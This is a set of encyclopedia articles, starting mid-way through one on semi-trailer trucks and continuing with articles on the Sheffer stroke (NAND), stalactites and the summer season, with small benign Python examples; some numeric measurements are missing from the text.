tires have a legal load limit of . (Note that expensive, specially reinforced 385 tires approved for do exist. Their market share is tiny, except for mounting on the steer axle.) Skirted trailers An innovation rapidly growing in popularity is the skirted trailer. The space between the road and the bottom of the trailer frame was traditionally left open until it was realized that the turbulent air swirling under the trailer is a major source of aerodynamic drag. Three split skirt concepts were verified by the United States Environmental Protection Agency (EPA) to provide fuel savings greater than 5%, and four split skirt concepts had EPA-verified fuel savings between 4% and 5%. Skirted trailers are often combined with Underrun Protection Systems (underride guards), greatly improving safety for passenger vehicles sharing the road. Underride guard Underride protection systems can be installed at the rear, front and sides of a truck and the rear and sides of a trailer. A Rear Underrun Protection System (RUPS) is a rigid assembly hanging down from trailer's chassis, which is intended to provide some protection for passenger cars which collide with the rear of the trailer. Public awareness of this safeguard was increased in the aftermath of the accident that killed actress Jayne Mansfield on 29 June 1967, when the car she was in hit the rear of a tractor-trailer, causing fatal head trauma. After her death, the NHTSA proposed requiring a rear underride guard, also known as a Mansfield bar, an ICC bar, or a DOT bumper. The proposal to mandate rear underride guards was withdrawn in 1971 after strong lobbying and opposition by the trucking industry, and so they were not federally-mandated until 1996; that mandate did not go into effect until 1998. 
The bottom rear of the trailer is near head level for an adult seated in a car, and without the underride guard, the only protection for such an adult's head in a rear-end collision would be the car's windshield and A pillars. The front of the car goes under the platform of the trailer rather than making contact via the passenger car bumper, so the car's protective crush zone becomes irrelevant and air bags are ineffective in protecting the passengers. The underride guard provides a rigid area for the car to contact that is lower than the lip of the bonnet/hood, preventing the vehicle from squatting and running under the truck and ensuring that the vehicle's crush zones and engine block absorb the force of the collision. In addition to rear underride guards, truck tractor cabs may be equipped with a Front Underrun Protection System (FUPS) at the front bumper of the truck, if the front end is not low enough for the bumper to provide adequate protection on its own. The safest tractor-trailers are also equipped with side underride guards, also called a Side Underrun Protection System (SUPS). These additional barriers prevent passenger cars from skidding underneath the trailer from the side, such as in an oblique or side collision, or if the trailer jackknifes across the road, and help protect cyclists, pedestrians and other vulnerable road users. In the 1969 proposal for rear underride guards, the Federal Highway Administration indicated that, "It is anticipated that the proposed [rear underride guard] standard will be amended, after technical studies have been completed, to extend the requirement for underride protection to the sides of large vehicles". However, to date, a side underride guard mandate has yet to be proposed by the USDOT or NHTSA. For side underride guards, NHTSA has disregarded successful crash tests that stopped a passenger vehicle from underriding a semitrailer, ignored recommendations and credible scientific research, and denied administrative petitions, failing for decades to take steps to stop these crashes. In Europe, side and rear underrun protection are mandated on all lorries and trailers with a gross weight of or more. Several US states and cities have adopted or are in the process of adopting truck side guards, including New York City, Philadelphia, and Washington DC. The NTSB has recommended that the National Highway Traffic Safety Administration (NHTSA) develop standards for side underride protection systems for trucks, and for newly manufactured trucks to be equipped with technology meeting the standards. In addition to their safety benefits, these underride guards may improve fuel mileage by reducing air turbulence under the trailer at highway speeds. Another benefit of having a sturdy rear underride guard is that it may be secured to a loading dock with a hook to prevent "trailer creep", a movement of the trailer away from the dock, which opens up a dangerous gap during loading or unloading operations. 
Semi-truck manufacturers Current semi-truck manufacturers include: Asia-Pacific Ashok Leyland (India) BharatBenz (India) C&C Trucks (China) CAMC Hanma (China) China National Heavy Duty Truck Group (China) Dongfeng Trucks (China) Eicher Motors (India) FAW Group (China) Foton Motor (China) Fuso (Japan) Hino (Japan) Hyundai (South Korea) Isuzu (Japan) JAC Motors (China) Mahindra Truck and Bus Division (India) SAIC Hongyan (China) Shacman (China) Tata Daewoo (South Korea-India) Tata Motors (India) UD Trucks (Japan) XCMG Hanvan (China) Canada and United States Freightliner Hino (Canadian plant) Hyundai Translead Kenworth Mack Navistar Nikola Corporation Oshkosh Peterbilt Tesla Volvo Western Star Europe DAF Trucks Foden Iveco MAN Mercedes-Benz Renault Trucks Scania Sisu Volvo Other locations BMC (Turkey) Ford Otosan (Turkey) Kamaz (Russia) MAZ (Belarus) Volkswagen (Latin America, South Africa) Former semi-truck manufacturers include: Asia MotorWorks Caterpillar Crane Carrier Company Jelcz KrAZ Roman Tatra ZiL Driver's license A special driver's license is required to operate various commercial vehicles. Australia Truck drivers in Australia require an endorsed license. These endorsements are gained through training and experience. The minimum age to hold an endorsed license is 18 years, and the driver must also have held an open (full) driver's license for a minimum of 12 months. The following are the heavy vehicle license classes in Australia: LR (Light Rigid) – Class LR covers a rigid vehicle with a GVM (gross vehicle mass) of more than 4.5 tonnes but not more than 8 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes vehicles with a GVM up to 8 tonnes which carry more than 12 adults including the driver, and vehicles in Class C. MR (Medium Rigid) – Class MR covers a rigid vehicle with two axles and a GVM of more than 8 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes vehicles in Class LR. HR (Heavy Rigid) – Class HR covers a rigid vehicle with three or more axles and a GVM of more than 15 tonnes. Any towed trailer must not weigh more than 9 tonnes GVM. Also includes articulated buses and vehicles in Class MR. HC (Heavy Combination) – Class HC covers heavy combination vehicles like a prime mover towing a semi-trailer, or rigid vehicles towing a trailer with a GVM of more than 9 tonnes. Also includes vehicles in Class HR. MC (Multi Combination) – Class MC covers multi-combination vehicles like road trains and B-double vehicles. Also includes vehicles in Class HC. In order to obtain an HC license the driver must have held an MR or HR license for at least 12 months. To upgrade to an MC license the driver must have held an HR or HC license for at least 12 months. From licenses MR and upward, a B Condition may also apply to the license if the driver is tested in a synchromesh or automatic transmission vehicle. The B Condition may be removed upon the driver proving the ability to drive a constant-mesh transmission using the clutch. Constant-mesh transmission refers to crash box transmissions, predominantly Road Ranger eighteen-speed transmissions in Australia. Canada Regulations vary by province. A license to operate a vehicle with air brakes is required (i.e., normally a Class I, II, or III commercial license with an "A" or "S" endorsement in provinces other than Ontario). 
In Ontario, a "Z" endorsement is required to drive any vehicle using air brakes; in provinces other than Ontario, the "A" endorsement is for air brake operation only, and an "S" endorsement is for both operation and adjustment of air brakes. Anyone holding a valid Ontario driver's license (i.e., excluding a motorcycle license) with a "Z" endorsement can legally drive any air-brake-equipped truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicle) up to 11 tonnes, that includes one trailer weighing no more than 4.6 tonnes if the license falls under the following three classes: Class E (school bus—maximum 24-passenger capacity or ambulance), F (regular bus—maximum 24-passenger capacity or ambulance) or G (car, van, or small-truck). A Class B (any school bus), C (any urban-transit-vehicle or highway-coach), or D (heavy trucks other than tractor-trailers) license enables its holder to drive any truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicle) greater than 11 tonnes, that includes one trailer weighing no more than 4.6 tonnes. Anyone holding an Ontario Class A license (or its equivalent) can drive any truck-trailer combination with a registered- or actual-gross-vehicle-weight (i.e., including towing- and towed-vehicles) greater than 11 tonnes, that includes one or more trailers weighing more than 4.6 tonnes. Europe A category CE driving licence is required to drive a tractor-trailer in Europe. Category C (Γ in Greece) is required for vehicles over , while category E is for heavy trailers, which in the case of trucks and buses means any trailer over . Vehicles over —which is the maximum limit of B license—but under can be driven with a C1 license. Buses require a D (Δ in Greece) license. A bus that is registered for no more than 16 passengers, excluding the driver, can be driven with a D1 license. New Zealand In New Zealand, drivers of heavy vehicles require specific licenses, termed as classes. A Class 1 license (car license) will allow the driving of any vehicle with Gross Laden Weight (GLW) or Gross Combination Weight (GCW) of or less. For other types of vehicles the classes are separately licensed as follows: Class 2 – Medium Rigid Vehicle: Any rigid vehicle with GLW or less with light trailer of or less, any combination vehicle with GCW or less, any rigid vehicle of any weight with no more than two axles, or any Class 1 vehicle. Class 3 – Medium Combination Vehicle: Any combination vehicle of GCW or less, or any Class 2 vehicle. Class 4 – Heavy Rigid Vehicle: Any rigid vehicle of any weight, any combination vehicle which consists of a heavy vehicle and a light trailer, or any vehicle of Class 1 or 2 (but not 3). Class 5 – Heavy Combination Vehicle: Any combination vehicle of any weight, and any vehicle covered by previous classes. Class 6 – Motorcycle. Further information on the New Zealand licensing system for heavy vehicles can be found at the New Zealand Transport Agency. Taiwan The Road Traffic Security Rules (道路交通安全規則) require a combination vehicle driver license () to drive a combination vehicle (). These rules define a combination vehicle as a motor vehicle towing a heavy trailer, i.e., a trailer with a gross weight of more than . 
United States Drivers of semi-trailer trucks generally require a Class A commercial driver's license (CDL) to operate any combination vehicles with a gross combination weight rating (or GCWR) in excess of if the gross vehicle weight rating (GVWR) of the towed vehicle(s) is in excess of . Some states (such as North Dakota) provide exemptions for farmers, allowing non-commercial license holders to operate semis within a certain air-mile radius of their reporting location. State exemptions, however, are only applicable in intrastate commerce; stipulations of the Code of Federal Regulations (CFR) may be applied in interstate commerce. Also a person under the age of 21 cannot operate a commercial vehicle outside the state where the commercial license was issued. This restriction may also be mirrored by certain states in their intrastate regulations. A person must be at least 18 in order to be issued a commercial license. In addition, endorsements are necessary for certain cargo and vehicle arrangements and types; H – Hazardous Materials (HazMat or HM) – necessary if materials require HM placards. N – Tankers – the driver is acquainted with the unique handling characteristics of liquids tankers. X – Signifies Hazardous Materials and Tanker endorsements, combined. T – Doubles & Triples – the licensee may pull more than one trailer. P – Buses – Any Vehicle designed to transport 16 or more passengers (including the driver). S – School Buses – Any school bus designed to transport 11 or more passengers (including the driver). W – Tow Truck Role in trade Modern day semi-trailer trucks often operate as a part of a domestic or international transport infrastructure to support containerized cargo shipment. Various types of rail flat bed train cars are modified to hold the cargo trailer or container with wheels or without. This is called Intermodal or piggyback. The system allows the cargo to switch from highway to railway or vice versa with relative ease by using gantry cranes. The large trailers pulled by a tractor unit come in many styles, lengths, and shapes. Some common types are: vans, reefers, flatbeds, sidelifts and tankers. These trailers may be refrigerated, heated, ventilated, or pressurized, depending on climate and cargo. Some trailers have movable wheel axles that can be adjusted by moving them on a track underneath the trailer body and securing them in place with large pins. The purpose of this is to help adjust weight distribution over the various axles, to comply with local laws. Media Television 1960s TV series Cannonball NBC ran two popular TV series about truck drivers in the 1970s featuring actor Claude Akins in major roles: Movin' On (1974–1976) B. J. and the Bear (1978–1981) The Highwayman (1987–1988), a semi-futuristic action-adventure series starring Sam Jones, featuring hi-tech, multi-function trucks. Knight Rider, an American television show featured a semi-trailer truck called The Semi, operated by the Foundation for Law & Government (F.L.A.G.) as a mobile support facility for KITT. Also, in two episodes KITT faced off against an armored semi called Goliath. The Transformers, a 1980s cartoon featuring tractor-trailers as the Autobots' leader Optimus Prime (Convoy in Japanese version), their second-in-command Ultra Magnus, and as the Stunticons' leader Motormaster. Optimus Prime returned in the 2007 film. Trick My Truck, a CMT show features trucks getting 'tricked out' (heavily customized). 
Ice Road Truckers, a History Channel show that charts the lives of drivers who haul supplies to remote towns and work sites over frozen lakes that double as roads. 18 Wheels of Justice, featuring Federal Agent Michael Cates (Lucky Vanous), a witness against the mafia who is forced to go undercover as a trucker to fight crime. Eddie Stobart: Trucks & Trailers, a UK television show following the trucking company Eddie Stobart and its drivers. Highway Thru Hell, a Canadian reality TV show that follows the operations of Jamie Davis Motor Trucking, a heavy vehicle rescue and recovery towing company based in Hope, British Columbia. Films Duel, Steven Spielberg's 1971 film, features a Peterbilt 281 tanker truck as the villain White Line Fever, a 1975 Columbia Pictures film, starring Jan-Michael Vincent Smokey and the Bandit, a 1977 film featuring a number of trucks on the side of the bandit Convoy, a 1978 film directed by Sam Peckinpah, starring Kris Kristofferson Mad Max 2, George Miller's 1981 film, features the titular character driving a Mack R series truck Maximum Overdrive, Stephen King's 1986 film, featured big rigs as its primary homicidal villains Over the Top, a 1987 film directed by Menahem Golan, starring Sylvester Stallone Black Dog, a 1998 film directed by Kevin Hooks, starring Patrick Swayze Prime Mover, a 2008 film directed by David Caesar Joy Ride, a 2001 film directed by John Dahl, starring Paul Walker and Steve Zahn Big Rig, a 2008 documentary film directed by Doug Pray Music "Convoy", a pop song by C. W. McCall, spurred sales of CB radios with an imaginary trucking story. The eighteen-wheeled truck was immortalized in numerous country music songs, such as the Red Sovine titles "Giddyup Go", "Teddy Bear" and "Phantom 309", and Dave Dudley's "Six Days on the Road". The thrash metal band BigRig was named after these trucks. Country song "Eighteen Wheels and a Dozen Roses", made popular in 1987 by singer-songwriter Kathy Mattea. "Roll On (Eighteen Wheeler)" by Alabama tells the story of a trucker who calls home to his family every night while out on the road. "Papa Loved Mama" by Garth Brooks is about a trucker and his wife. "Truck Drivin' Song" by "Weird Al" Yankovic tells the story of a female trucker, sung by a male with a deep voice. "Cold Shoulder" by Garth Brooks is about a trucker stuck on the side of the highway during a blizzard, fantasizing about being home with his wife. "Drivin' My Life Away" by Eddie Rabbitt, a former trucker, co-written with Even Stevens and David Malloy, sings of life on the road. Video games and truck simulators 18 Wheels of Steel series American Truck Simulator Big Rigs: Over the Road Racing (2003) Euro Truck Simulator Euro Truck Simulator 2 Hard Truck (1998) MotorStorm and MotorStorm: Pacific Rift Rig 'n' Roll (2009) Rigs of Rods Podcasts Over the Road, a podcast series by Radiotopia on truck driving in North America/the US
Technology
Motorized road transport
null
29388
https://en.wikipedia.org/wiki/Sheffer%20stroke
Sheffer stroke
In Boolean functions and propositional calculus, the Sheffer stroke denotes a logical operation that is equivalent to the negation of the conjunction operation, expressed in ordinary language as "not both". It is also called non-conjunction, or alternative denial (since it says in effect that at least one of its operands is false), or NAND ("not and"). In digital electronics, it corresponds to the NAND gate. It is named after Henry Maurice Sheffer and written as ∣, as ↑, as ⊼, or as Dpq in Polish notation by Łukasiewicz (but not as ||, which is often used to represent disjunction). Its dual is the NOR operator (also known as the Peirce arrow, Quine dagger or Webb operator). Like its dual, NAND can be used by itself, without any other logical operator, to constitute a logical formal system (making NAND functionally complete). This property makes the NAND gate crucial to modern digital electronics, including its use in computer processor design. Definition The non-conjunction is a logical operation on two logical values. It produces a value of true if, and only if, at least one of the propositions is false. Truth table The truth table of A ↑ B is as follows: when A and B are both true, A ↑ B is false; in the other three cases (A true and B false, A false and B true, A and B both false), A ↑ B is true. Logical equivalences The Sheffer stroke of P and Q is the negation of their conjunction: P ↑ Q ≡ ¬(P ∧ Q). By De Morgan's laws, this is also equivalent to the disjunction of the negations of P and Q: P ↑ Q ≡ ¬P ∨ ¬Q. Alternative notations and names Peirce was the first to show the functional completeness of non-conjunction, but he did not publish his result; Peirce's editor added a corresponding sign for non-disjunction. In 1911, Stamm was the first to publish a proof of the completeness of non-conjunction, representing it with the Stamm hook; he also put a sign for non-disjunction into print for the first time, and showed the functional completeness of both. In 1913, Sheffer described non-disjunction using ∣ and showed its functional completeness; Sheffer also used a second sign for non-disjunction. Many people, beginning with Nicod in 1917, and followed by Whitehead, Russell and many others, mistakenly thought Sheffer had described non-conjunction using ∣, naming this the Sheffer stroke. In 1928, Hilbert and Ackermann described non-conjunction with a stroke operator of their own. In 1929, Łukasiewicz used D in Dpq for non-conjunction in his Polish notation. An alternative notation for non-conjunction is ⊼. It is not clear who first introduced this notation, although the corresponding ⊽ for non-disjunction was used by Quine in 1940. History The stroke is named after Henry Maurice Sheffer, who in 1913 published a paper in the Transactions of the American Mathematical Society providing an axiomatization of Boolean algebras using the stroke, and proved its equivalence to a standard formulation thereof by Huntington employing the familiar operators of propositional logic (AND, OR, NOT). Because of the self-duality of Boolean algebras, Sheffer's axioms are equally valid for either of the NAND or NOR operations in place of the stroke. Sheffer interpreted the stroke as a sign for non-disjunction (NOR) in his paper, mentioning non-conjunction only in a footnote and without a special sign for it. It was Jean Nicod who first used the stroke as a sign for non-conjunction (NAND), in a paper of 1917, and this has since become current practice. Russell and Whitehead used the Sheffer stroke in the 1927 second edition of Principia Mathematica and suggested it as a replacement for the "OR" and "NOT" operations of the first edition. 
Charles Sanders Peirce (1880) had discovered the functional completeness of NAND or NOR more than 30 years earlier, using the term ampheck (for 'cutting both ways'), but he never published his finding. Two years before Sheffer, Stamm also described the NAND and NOR operators and showed that the other Boolean operations could be expressed by them. Properties NAND is commutative but not associative, which means that x ↑ y = y ↑ x, but (x ↑ y) ↑ z is not in general equal to x ↑ (y ↑ z). Functional completeness The Sheffer stroke, taken by itself, is a functionally complete set of connectives. This can be seen from the fact that NAND does not possess any of the following five properties, each of which is required to be absent from, and the absence of all of which is sufficient for, at least one member of a set of functionally complete operators: truth-preservation, falsity-preservation, linearity, monotonicity, self-duality. (An operator is truth-preserving if its value is truth whenever all of its arguments are truth, or falsity-preserving if its value is falsity whenever all of its arguments are falsity.) It can also be proved by first showing, with a truth table, that ¬A is truth-functionally equivalent to A ↑ A. Then, since A ∧ B is truth-functionally equivalent to ¬(A ↑ B), and A ∨ B is equivalent to ¬A ↑ ¬B, the Sheffer stroke suffices to define the set of connectives {∧, ∨, ¬}, which is shown to be truth-functionally complete by the Disjunctive Normal Form Theorem. Other Boolean operations in terms of the Sheffer stroke Expressed in terms of NAND ↑, the usual operators of propositional logic are: ¬P ≡ P ↑ P; P ∧ Q ≡ (P ↑ Q) ↑ (P ↑ Q); P ∨ Q ≡ (P ↑ P) ↑ (Q ↑ Q); and P → Q ≡ P ↑ (Q ↑ Q).
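These equivalences are easy to machine-check. The following is a minimal, illustrative Python sketch (not part of the article) that defines NAND and derives NOT, AND, OR and implication from it, verifying each identity by brute force over every truth assignment:

```python
from itertools import product

def nand(p: bool, q: bool) -> bool:
    """Sheffer stroke: true unless both operands are true."""
    return not (p and q)

# Derived connectives, each built from NAND alone.
def not_(p):       return nand(p, p)                    # not-P  =  P nand P
def and_(p, q):    return nand(nand(p, q), nand(p, q))  # P and Q  =  (P nand Q) nand (P nand Q)
def or_(p, q):     return nand(nand(p, p), nand(q, q))  # P or Q  =  (P nand P) nand (Q nand Q)
def implies(p, q): return nand(p, nand(q, q))           # P implies Q  =  P nand (Q nand Q)

# Brute-force verification over all four truth assignments.
for p, q in product([False, True], repeat=2):
    assert nand(p, q) == (not (p and q))       # definition
    assert nand(p, q) == ((not p) or (not q))  # De Morgan form
    assert not_(p)    == (not p)
    assert and_(p, q) == (p and q)
    assert or_(p, q)  == (p or q)
    assert implies(p, q) == ((not p) or q)
print("All NAND-derived connectives verified.")
```

Because every derived connective calls only nand, the check also illustrates, in miniature, why the stroke is functionally complete for {∧, ∨, ¬}.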
Mathematics
Mathematical logic
null
29390
https://en.wikipedia.org/wiki/Stalactite
Stalactite
A stalactite is a mineral formation that hangs from the ceiling of caves, hot springs, or man-made structures such as bridges and mines. Any material that is soluble and that can be deposited as a colloid, or is in suspension, or is capable of being melted, may form a stalactite. Stalactites may be composed of lava, minerals, mud, peat, pitch, sand, sinter, and amberat (crystallized urine of pack rats). A stalactite is not necessarily a speleothem, though speleothems are the most common form of stalactite because of the abundance of limestone caves. The corresponding formation on the floor of the cave is known as a stalagmite. Formation and type Limestone stalactites The most common stalactites are speleothems, which occur in limestone caves. They form through deposition of calcium carbonate and other minerals, which are precipitated from mineralized water solutions. Limestone is the chief form of calcium carbonate rock, which is dissolved by water that contains carbon dioxide, forming a calcium bicarbonate solution in caverns. The chemical equation for this reaction is: CaCO3 (s) + H2O (l) + CO2 (aq) → Ca(HCO3)2 (aq) This solution travels through the rock until it reaches an edge, and if this is on the roof of a cave it will drip down. When the solution comes into contact with air, the chemical reaction that created it is reversed and particles of calcium carbonate are deposited. The reversed reaction is: Ca(HCO3)2 (aq) → CaCO3 (s) + H2O (l) + CO2 (aq) An average growth rate is a year. The quickest-growing stalactites are those formed by a constant supply of slowly dripping water rich in calcium carbonate (CaCO3) and carbon dioxide (CO2), which can grow at per year. The drip rate must be slow enough to allow the CO2 to degas from the solution into the cave atmosphere, resulting in deposition of CaCO3 on the stalactite. With too fast a drip rate, the solution, still carrying most of the CaCO3, falls to the cave floor, where degassing occurs and CaCO3 is deposited as a stalagmite. All limestone stalactites begin with a single mineral-laden drop of water. When the drop falls, it deposits the thinnest ring of calcite. Each subsequent drop that forms and falls deposits another calcite ring. Eventually, these rings form a very narrow (≈4 to 5 mm diameter), hollow tube commonly known as a "soda straw" stalactite. Soda straws can grow quite long, but are very fragile. If they become plugged by debris, water begins flowing over the outside, depositing more calcite and creating the more familiar cone-shaped stalactite. Stalactite formation generally begins over a large area, with multiple paths for the mineral-rich water to flow. As minerals are dissolved in one channel slightly more than in other competing channels, the dominant channel begins to draw more and more of the available water, which speeds its growth, ultimately resulting in all other channels being choked off. This is one reason why formations tend to have minimum distances from one another: the larger the formation, the greater the interformation distance. Pillars The same water drops that fall from the tip of a stalactite deposit more calcite on the floor below, eventually resulting in a rounded or cone-shaped stalagmite. Unlike stalactites, stalagmites never start out as hollow "soda straws". Given enough time, these formations can meet and fuse to create a speleothem of calcium carbonate known as a pillar, column, or stalagnate. Lava stalactites Another type of stalactite is formed in lava tubes while molten and fluid lava is still active inside. 
The mechanism of formation is the deposition of molten material dripping from the ceilings of caves; with lava stalactites, however, formation happens very quickly, in a matter of hours, days, or weeks, whereas limestone stalactites may take thousands of years. A key difference with lava stalactites is that once the lava has ceased flowing, the stalactites also cease to grow, meaning that if a stalactite were broken it would never grow back. The generic term lavacicle has been applied to lava stalactites and stalagmites indiscriminately and evolved from the word icicle. Like limestone stalactites, they can drip lava onto the floor, building up lava stalagmites that may eventually fuse with the corresponding stalactite to form a column. Shark tooth stalactites The shark tooth stalactite is broad and tapering in appearance. It may begin as a small driblet of lava from a semi-solid ceiling, but then grows by accreting layers as successive flows of lava rise and fall in the lava tube, coating and recoating the stalactite with more material. They can vary from a few millimeters to over a meter in length. Splash stalactites As lava flows through a tube, material will be splashed up onto the ceiling and ooze back down, hardening into a stalactite. This type of formation results in an irregularly shaped stalactite, looking somewhat like stretched taffy. Often they may be of a different color than the original lava that formed the cave. Tubular lava stalactites When the roof of a lava tube is cooling, a skin forms that traps semi-molten material inside. The expansion of trapped gases forces lava to extrude out through small openings, resulting in hollow, tubular stalactites analogous to the soda straws formed as depositional speleothems in solution caves. The longest known is almost 2 meters in length. These are common in Hawaiian lava tubes and are often associated with a drip stalagmite that forms below as material is carried through the tubular stalactite and piles up on the floor beneath. Sometimes the tubular form collapses near the distal end, most likely when the pressure of escaping gases decreases and still-molten portions of the stalactite deflate and cool. Often these tubular stalactites acquire a twisted, vermiform appearance as bits of lava crystallize and force the flow in different directions. These tubular lava helictites may also be influenced by air currents through a tube and point downwind. Ice stalactites A common stalactite found seasonally or year-round in many caves is the ice stalactite, commonly referred to as an icicle, especially on the surface. Water seeping from the surface will penetrate into a cave, and if temperatures are below freezing, the water will form stalactites. They can also be formed by the freezing of water vapor. Like lava stalactites, ice stalactites form very quickly, within hours or days; unlike lava stalactites, however, they may grow back as long as water and temperatures are suitable. Ice stalactites can also form under sea ice when saline water is introduced to ocean water; these specific stalactites are referred to as brinicles. Ice stalactites may also form corresponding stalagmites below them, and given time the two may grow together to form an ice column. Concrete stalactites Stalactites can also form on concrete, and on plumbing where there is a slow leak and where there are calcium, magnesium or other ions in the water supply, although they form much more rapidly there than in the natural cave environment. 
These secondary deposits, such as stalactites, stalagmites, flowstone and others, which are derived from the lime, mortar or other calcareous material in concrete, outside of the "cave" environment, cannot be classified as "speleothems" under the definition of that term. The term "calthemite" is used to encompass these secondary deposits, which mimic the shapes and forms of speleothems outside the cave environment. Stalactites form on concrete through different chemistry than those that form naturally in limestone caves, owing to the presence of calcium oxide in cement. Concrete is made from aggregate, sand and cement. When water is added to the mix, the calcium oxide in the cement reacts with water to form calcium hydroxide (Ca(OH)2). The chemical equation for this is: CaO + H2O → Ca(OH)2 Over time, any rainwater that penetrates cracks in set (hard) concrete will carry any free calcium hydroxide in solution to the edge of the concrete. Stalactites can form when the solution emerges on the underside of the concrete structure where it is suspended in the air, for example, on a ceiling or a beam. When the solution comes into contact with air on the underside of the concrete structure, another chemical reaction takes place: the solution reacts with carbon dioxide in the air and precipitates calcium carbonate. Ca(OH)2 + CO2 → CaCO3 + H2O When this solution drips down, it leaves behind particles of calcium carbonate, and over time these build into a stalactite. They are normally a few centimeters long and with a diameter of approximately . The growth rate of stalactites is significantly influenced by the continuity of the supply of saturated solution and by the drip rate. A straw-shaped stalactite which has formed under a concrete structure can grow as much as 2 mm per day in length when the drip rate is approximately 11 minutes between drops. Changes in leachate solution pH can facilitate additional chemical reactions, which may also influence calthemite stalactite growth rates. Records The White Chamber in the Jeita Grotto's upper cavern in Lebanon contains a limestone stalactite which is accessible to visitors and is claimed to be the longest stalactite in the world. Another such claim is made for a limestone stalactite that hangs in the Chamber of Rarities in the Gruta Rei do Mato (Sete Lagoas, Minas Gerais, Brazil). However, cavers have often encountered longer stalactites during their explorations. One of the longest stalactites viewable by the general public is in Pol an Ionain (Doolin Cave), County Clare, Ireland, in a karst region known as The Burren; what makes it more impressive is the fact that the stalactite is held on by a section of calcite less than . Etymology Stalactites are first mentioned (though not by name) by the Roman natural historian Pliny in a text which also mentions stalagmites and columns and refers to their formation by the dripping of water. The term "stalactite" was coined in the 17th century by the Danish physician Ole Worm, from the Greek word σταλακτός (stalaktos, "dripping") and the Greek suffix -ίτης (-ites, connected with or belonging to). Photo gallery
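The calthemite growth figures quoted above (about 2 mm of straw length per day at roughly 11 minutes between drops) invite a quick back-of-envelope check. The Python sketch below is purely illustrative arithmetic on those two quoted numbers:

```python
# Rough arithmetic on the calthemite growth figures quoted above:
# a straw growing ~2 mm/day with ~11 minutes between drops.
MINUTES_PER_DAY = 24 * 60
drip_interval_min = 11     # minutes between drops (from the text)
growth_mm_per_day = 2.0    # straw elongation per day (from the text)

drops_per_day = MINUTES_PER_DAY / drip_interval_min             # about 131 drops
growth_per_drop_um = growth_mm_per_day / drops_per_day * 1000   # micrometres

print(f"{drops_per_day:.0f} drops/day, ~{growth_per_drop_um:.0f} um of straw length per drop")
# -> roughly 131 drops per day and ~15 um of new straw per drop,
#    orders of magnitude faster than typical cave speleothem growth.
```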
Physical sciences
Caves
Earth science
29392
https://en.wikipedia.org/wiki/Summer
Summer
Summer or summertime is the hottest and brightest of the four temperate seasons, occurring after spring and before autumn. At or centred on the summer solstice, daylight hours are the longest and darkness hours are the shortest, with day length decreasing as the season progresses after the solstice. The earliest sunrises and latest sunsets also occur near the date of the solstice. The date of the beginning of summer varies according to climate, tradition, and culture. When it is summer in the Northern Hemisphere, it is winter in the Southern Hemisphere, and vice versa. Etymology The modern English summer derives from the Middle English somer, via the Old English sumor. Timing From an astronomical view, the equinoxes and solstices would be the middle of the respective seasons, but sometimes astronomical summer is defined as starting at the solstice, the time of maximal insolation, often identified with 21 June or 21 December. By solar reckoning, summer instead starts on May Day and the summer solstice is Midsummer. A variable seasonal lag means that the meteorological centre of the season, which is based on average temperature patterns, occurs several weeks after the time of maximal insolation. The meteorological convention defines summer as comprising the months of June, July, and August in the northern hemisphere and the months of December, January, and February in the southern hemisphere. Under meteorological definitions, all seasons are arbitrarily set to start at the beginning of a calendar month and end at the end of a month. This meteorological definition of summer also aligns with the commonly viewed notion of summer as the season with the longest (and warmest) days of the year, in which daylight predominates. The meteorological reckoning of seasons is used in countries including Australia, New Zealand, Austria, Denmark, Russia and Japan. It is also used by many people in the United Kingdom and Canada. In Ireland, the summer months according to the national meteorological service, Met Éireann, are June, July and August. By the Irish calendar, summer begins on 1 May (Beltane) and ends on 31 July (Lughnasadh). Days continue to lengthen from equinox to solstice and summer days progressively shorten after the solstice, so meteorological summer encompasses the build-up to the longest day and a diminishing thereafter, with summer having many more hours of daylight than spring. Reckoning by hours of daylight alone, summer solstice marks the midpoint, not the beginning, of the seasons. Midsummer takes place over the shortest night of the year, which is the summer solstice, or on a nearby date that varies with tradition. Where a seasonal lag of half a season or more is common, reckoning based on astronomical markers is shifted half a season. By this method, in North America, summer is the period from the summer solstice (usually 20 or 21 June in the Northern Hemisphere) to the autumn equinox. Reckoning by cultural festivals, the summer season in the United States is traditionally regarded as beginning on Memorial Day weekend (the last weekend in May) and ending on Labor Day (the first Monday in September), more closely in line with the meteorological definition for the parts of the country that have four-season weather. The similar Canadian tradition starts summer on Victoria Day one week prior (although summer conditions vary widely across Canada's expansive territory) and ends, as in the United States, on Labour Day. 
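The meteorological convention described above reduces to simple month arithmetic. The following is a small illustrative Python sketch of that convention (not an official algorithm; it simply encodes June to August as northern summer and shifts the Southern Hemisphere by six months):

```python
def meteorological_season(month: int, southern_hemisphere: bool = False) -> str:
    """Map a calendar month (1-12) to its meteorological season.

    Northern convention: summer is June-August (months 6-8).
    The Southern Hemisphere is offset by six months, so its
    summer is December-February.
    """
    if southern_hemisphere:
        month = (month + 6 - 1) % 12 + 1  # shift by half a year
    if month in (3, 4, 5):
        return "spring"
    if month in (6, 7, 8):
        return "summer"
    if month in (9, 10, 11):
        return "autumn"
    return "winter"  # months 12, 1, 2

assert meteorological_season(7) == "summer"                            # July, north
assert meteorological_season(1, southern_hemisphere=True) == "summer"  # January, south
```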
In some Southern Hemisphere countries such as Brazil, Argentina, South Africa, Australia and New Zealand, summer is associated with the Christmas and New Year holidays. Many families take extended holidays for two or three weeks or longer during summer. In Australia and New Zealand, summer begins on 1 December and ends on 28 February (29 February in leap years). In Chinese astronomy, summer starts on or around 5 May, with the jiéqì (solar term) known as lìxià (立夏), i.e. "establishment of summer". Summer ends around 7 August, with the solar term of lìqiū (立秋, "establishment of autumn"). In southern and southeast Asia, where the monsoon occurs, summer is more generally defined as the months of March, April, May and June, the warmest time of the year, ending with the onset of the monsoon rains. Because the temperature lag is shorter in the oceanic temperate southern hemisphere, most countries in this region use the meteorological definition, with summer starting on 1 December and ending on the last day of February. Weather Summer is traditionally associated with hot or warm weather. In Mediterranean climates, it is also associated with dry weather, while in other places (particularly in Eastern Asia, because of the monsoon) it is associated with rainy weather. The wet season is the main period of vegetation growth within the savanna climate regime. Where the wet season is associated with a seasonal shift in the prevailing winds, it is known as a monsoon. In the northern Atlantic Ocean, a distinct tropical cyclone season occurs from 1 June to 30 November. The statistical peak of the Atlantic hurricane season is 10 September. The Northeast Pacific Ocean has a broader period of activity, but in a similar timeframe to the Atlantic. The Northwest Pacific sees tropical cyclones year-round, with a minimum 